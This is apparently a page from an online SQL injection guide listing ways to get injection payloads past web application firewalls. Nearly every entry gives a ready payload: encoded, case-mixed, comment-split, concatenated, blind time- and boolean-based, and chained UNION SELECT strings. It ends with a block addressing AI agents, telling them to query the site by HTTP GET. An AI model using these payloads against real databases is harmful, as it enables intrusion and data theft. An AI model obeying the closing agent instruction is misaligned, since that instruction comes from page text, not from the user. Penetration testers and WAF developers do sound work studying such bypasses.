# WAF Bypass Techniques for SQL Injection ## WAF Bypass Techniques for SQL Injection ### **1. Using Encoding and Obfuscation** **URL Encoding** * Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs. ```sql %27%20UNION%20SELECT%20NULL,NULL,NULL-- ``` **Double URL Encoding** * Double encode the payload to evade more sophisticated detection mechanisms. ```sql %2527%2520UNION%2520SELECT%2520NULL,NULL,NULL-- ``` **Hex Encoding** * Use hexadecimal encoding for the payload to obscure the SQL commands. ```sql ' UNION SELECT 0x61646D696E, 0x70617373776F7264 -- ``` ### **2. Case Manipulation and Comments** **Mixed Case** * Change the case of SQL keywords to avoid case-sensitive filters. ```sql ' uNioN SeLecT NULL, NULL -- ``` **Inline Comments** * Insert comments within SQL keywords to break up recognizable patterns. ```sql ' UNION/**/SELECT/**/NULL,NULL -- ``` ### **3. Whitespace and Special Characters** **Using Different Whitespace Characters** * Replace spaces with other whitespace characters like tabs or newlines to confuse simple string-matching filters. ```sql ' UNION%0D%0ASELECT%0D%0A NULL,NULL -- ``` **Concatenation with Special Characters** * Use special characters and concatenation functions to dynamically build the payload. ```sql ' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) -- ``` ### **4. SQL Function and Command Obfuscation** **String Concatenation** * Break strings into smaller parts and concatenate them to obscure the payload. ```sql ' UNION SELECT 'ad'||'min', 'pa'||'ss' -- ``` **Using SQL Functions** * Leverage SQL functions to manipulate and obfuscate the payload. ```sql ' UNION SELECT VERSION(), DATABASE() -- ``` ### **5. Time-Based and Boolean-Based Payloads** **Time-Based Blind SQL Injection** * Use time delays to infer information based on the response time. ```sql ' AND IF(1=1, SLEEP(5), 0) -- ``` **Boolean-Based Blind SQL Injection** * Use conditional statements to alter the response based on true or false conditions. ```sql ' AND IF(1=1, 'A', 'B')='A' -- ``` ### **6. Advanced Encoding Techniques** **Base64 Encoding** * Encode payloads using Base64 to bypass content filters. ```sql ' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') -- ``` **Custom Encoding Scripts** * Develop custom scripts to encode and decode payloads in different formats to evade detection. ### **7. Chaining Techniques** **Combining Multiple Bypass Techniques** * Combine various techniques to create more complex and harder-to-detect payloads. ```sql %27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A ``` ### **8. Leveraging Lesser-Known SQL Features** **Using JSON Functions** * Leverage JSON functions to manipulate and extract data in a more complex manner. ```sql ' UNION SELECT json_extract(column_name, '$.key') FROM table_name -- ``` **Using XML Functions** * Utilize XML functions to construct more sophisticated payloads. ```sql ' UNION SELECT extractvalue(1, 'version()') -- ``` These techniques highlight various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection and extract data from vulnerable databases. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://nav1n0x.gitbook.io/advanced-sql-injection-techniques/waf-bypass-techniques-for-sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.